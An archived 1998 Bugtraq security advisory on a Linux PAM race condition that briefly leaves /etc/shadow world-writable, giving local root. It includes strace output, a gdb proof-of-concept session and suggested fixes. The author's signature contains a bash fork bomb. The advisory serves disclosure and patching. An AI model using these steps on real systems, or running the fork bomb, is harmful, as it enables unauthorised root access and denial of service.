Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00


                                            `Date: Wed, 23 Dec 1998 13:12:45 +0100  
From: Michal Zalewski <lcamtuf@IDS.PL>  
Reply-To: Bugtraq List <>  
Subject: Linux PAM (up to 0.64-2) local root compromise  
As someone said, "Never make any mistaeks."  
Latest release of Linux Pluggable Authentication Modules (pam-0.64-2, as  
well as previous ones), has huge security flaw in  
module, which can be exploited to gain read/write permissions to  
/etc/shadow file.  
Vunerable platforms:  
Almost any Linux with PAM + PAM-compliant passwd utility. Both RFC and  
PAM readme recommends as default password manipulation  
routine. Note: RedHat 5.x distribution isn't vunerable, because this  
module is obsoleted with newer, universal, while bug in (shipped with dist) is still present.  
In the other words, if you have Linux PAM installed on your system 'by  
hand', as described in RFC/FAQs, your system is vunerable. Default RedHat 5.x  
installation is less or more secure. We have no information about other  
PAM-compliant distributions.  
There's no information about SunOS/Solaris/etc PAM, as it's slightly  
different than Linux version.  
Quick vunerability test:  
$ grep pam_unix_passwd /etc/pam.conf /etc/pam.d/passwd  
- Read and write permissions to /etc/shadow file,  
- Superuser privledges, locally.  
Default password change routine in module, called  
>from passwd utility, creates temporary file /etc/nshadow using fopen().  
Unfortunately, process umask isn't changed. After approx. 3 syscalls,  
chmod is called to set proper mode on this file (0600). But, for these  
3 syscalls, file permissions are equal to 0666 ~ umask. If umask of  
current process (which is inherited from parent process, of course)  
is set to 0, we have /etc/nshadow file with permissions 0666. Then,  
after all, it's moved using rename() to /etc/shadow. Cute.  
strace output for critical part of code:  
2957 open("/etc/nshadow", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 8  
2957 chown("/etc/nshadow", 0, 0) = 0  
2957 chmod("/etc/nshadow", 0600) = 0  
2957 rename("/etc/nshadow", "/etc/shadow") = 0  
[lcamtuf@nimue /]$ umask 0  
[lcamtuf@nimue /]$ echo $$  
[lcamtuf@nimue /]$ exec passwd  
Changing password for lcamtuf  
(current) UNIX password:  
New UNIX password:  
[root@nimue /root]# gdb passwd 3023  
Attaching to program `/usr/bin/passwd', process 3023  
0x400c37b4 in __read ()  
(gdb) break chown  
Breakpoint 1 at 0x400c4480  
(gdb) c  
Retype new UNIX password:  
Breakpoint 1, 0x400c4480 in chown ()  
[root@nimue /root]# ls -la /etc/nshadow  
-rw-rw-rw- 1 root root 0 Dec 4 11:56 /etc/nshadow  
Typical race. Considerated exploitable :-)  
The closing:  
Lame fix: chmod -s /usr/bin/passwd  
Better fix: add umask(077); somewhere ;P  
Thanks to: Nises and manY for patience :-)  
Michal Zalewski [] [ENSI / marchew] [ SYSADM]  
[] <=--=> bash$ :(){ :|:&};:  
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]  
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]